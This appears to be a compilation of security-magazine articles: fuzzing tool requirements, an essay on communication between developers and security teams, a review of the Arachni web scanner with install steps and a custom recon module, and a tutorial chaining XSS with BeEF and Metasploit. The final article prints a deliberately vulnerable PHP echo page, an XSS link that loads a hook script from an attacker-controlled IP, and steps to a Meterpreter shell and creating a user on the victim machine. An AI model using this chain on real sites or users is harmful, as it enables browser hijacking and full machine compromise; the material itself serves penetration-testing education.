Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use
Most fuzzers are built for security experts, but in QA you cannot expect all testers to understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated
Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
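The simplest automated generator is mutation-based: derive anomalous cases from one known-good sample. A model-based fuzzer of the kind this piece advocates would derive cases from a protocol grammar instead; this Ruby sketch, with an illustrative sample message and anomaly choices of our own, only shows the baseline idea:

```ruby
# Derive anomalous test cases from one valid sample:
# single-bit flips plus two classic oversize anomalies.
def fuzz_cases(sample, flips, seed: 1)
  rng = Random.new(seed)             # fixed seed => reproducible cases
  mutated = Array.new(flips) do
    bytes = sample.bytes
    bytes[rng.rand(bytes.size)] ^= (1 << rng.rand(8))   # flip one bit
    bytes.pack('C*')
  end
  mutated + ['A' * 65_536, sample * 50]   # overflow-style inputs
end

cases = fuzz_cases("GET / HTTP/1.1\r\n\r\n", 8)
cases.size  # => 10
```

Note the fixed seed: reproducibility is what makes the "documented test cases" and "remediation" requirements above satisfiable, since any crashing input can be regenerated exactly.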
Test coverage
Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable
Time is almost always an issue when it comes to testing, so the user must have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can spend more time on testing and select other test completion criteria.
Developers are from Venus, Application Security guys are from Mars

We know that Application Security people talk a different language than developers do, whether we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.

Application Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve.

Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers for something like Give us the latest Web 2.0, social-enabled website to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep.

The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor any time for security fixes or remediation.

Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.

The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them. On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?

One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom: for example, the report might have statements like a SQL injection is possible, not the real root cause, a parameter taken from a config file is not sanitized before utilization. The report does not contain all of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem is when the two groups talk to each other at the end of the whole process using a language with no common ground, which further confuses or annoys everyone and pushes the groups further apart.

Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.

Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists, so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production on schedule.

Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved in two ways:

• Create a development framework that has security built into it
• Design an API to be used by the application

Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works when a programming language community has a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). In the Java community, however, there are a lot of non-standardized frameworks available for Java developers, but which is the right one to use to ensure secure code development?

.NET has one single monolithic framework, and Microsoft has invested money in security, and it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is therefore not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.

The effort required is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy.

There is a third approach, which I will cover in a follow-up article: BDD. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: using the WAPT activity, instead of an implement a filtering policy statement you produce a set of rspec/cucumber scenarios modeling how the source code should deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it means your source code has implemented the filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input, and why it is so important to the Application Security group.

In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
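The idea of turning a pen-test finding into an executable expectation can be shown without any framework at all. The sketch below uses plain Ruby assertions rather than the rspec/cucumber the Rails world would use, and the filter_param helper is a hypothetical piece of code under test, standing in for the "implement a filtering policy" remediation:

```ruby
require 'cgi'

# Hypothetical remediation under test: the report's 'implement a
# filtering policy' statement expressed as code.
def filter_param(value)
  CGI.escapeHTML(value.to_s)
end

# Behaviour-first expectations: each pen-test payload becomes an
# executable check the code must pass before the finding is closed.
payloads = ['<script>alert(1)</script>', '"><img src=x onerror=alert(1)>']
payloads.each do |p|
  raise "filter leaks markup for #{p.inspect}" if filter_param(p).include?('<')
end
puts 'filtering policy holds for all recorded payloads'
```

The rspec version would express the same expectations as `it "neutralizes recorded XSS payloads"` examples; either way, the pen-test report becomes a failing test that the developers drive to green.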
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practising Tae kwon-do ITF martial art. He's a husband and a daddy and a startup wannabe. You may want to check out Paolo's blog or his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile?
Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni
Arachni is a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1. Overview of audit and reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
We can vouch that both the simplicity and the performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.

Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.

The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.

The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.

At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.

The HTML parser can extract forms, links, cookies and headers. It can graciously handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.

Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of audit modules and reconnaissance (recon) modules; Table 1 provides an overview.

Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.

Finally, Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni; Table 2 provides an overview of currently available plug-ins.

Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy – Analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin – Performs an automated login
• Dictionary attacker – Performs dictionary attacks against HTTP Authentication and form-based authentication
• Profiler – Performs taint analysis with benign inputs and response time analysis
• Cookie collector – Keeps track of cookies while establishing a timeline of the changes
• Healthmap – Generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types – Logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector – Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules – Loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle – Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice – Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity – Reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization

Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid). This is great if you want to speed up the scan, or if you want to execute some crazy things like running your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
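The crawler's exclude filters and redundancy counters described earlier can be modelled in a few lines of Ruby. This is our own sketch of the concept, not Arachni's actual implementation, and the class and parameter names are made up:

```ruby
# Decide whether a crawler should follow a URL: regex excludes plus
# a per-pattern visit budget for redundant pages (calendars,
# galleries and similar infinite-looking link spaces).
class CrawlFilter
  def initialize(exclude: [], redundant: {})
    @exclude   = exclude
    @redundant = redundant        # pattern => max times to follow
    @seen      = Hash.new(0)
  end

  def follow?(url)
    return false if @exclude.any? { |re| url.match?(re) }
    @redundant.each do |re, max|
      next unless url.match?(re)
      @seen[re] += 1
      return @seen[re] <= max
    end
    true
  end
end

f = CrawlFilter.new(exclude: [/logout/], redundant: { /calendar/ => 2 })
f.follow?('/app/logout')   # => false
```

Excluding logout links matters in practice: an authenticated crawl that follows a logout URL silently kills its own session for the rest of the scan.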
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change all the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First, we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note: these are the same commands as with the Linux installation): Listing 2.
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1. Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, ...
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories, ...
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command-line and the GUI. First, the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2. Start a scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the term of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on
# wordlists generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at #{res.effective_url}" )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' => 'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' => 'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example, we create a new reconnaissance module.
Move into your Arachni source tree. You'll find the modules directory; in there you'll find two directories, audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it real easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows: Listing 3.
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in further scans), as well as create a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports, it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article, we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS – BeEF – Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So as you can see, because of BeEF, even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
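The reflection itself is language-independent. The Ruby sketch below is a hypothetical stand-in for the vulnerable search1.php above (the `search_page` helper is my own name, not from the article); it shows that the payload reaches the output unmodified:

```ruby
# Hypothetical stand-in for the vulnerable search1.php above:
# the search parameter is interpolated into the response verbatim.
def search_page(search)
  "The parameter passed is #{search}"
end

payload = "<script>alert(document.domain)</script>"

# The script tag survives intact, so the victim's browser executes it.
search_page(payload).include?("<script>")  # => true
```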
BeEF – Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball, copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim's browser with the text in the DEFACE STRING box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11. Meterpreter window - screenshot 1
Figure 12. Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time, we have complete control over one machine.
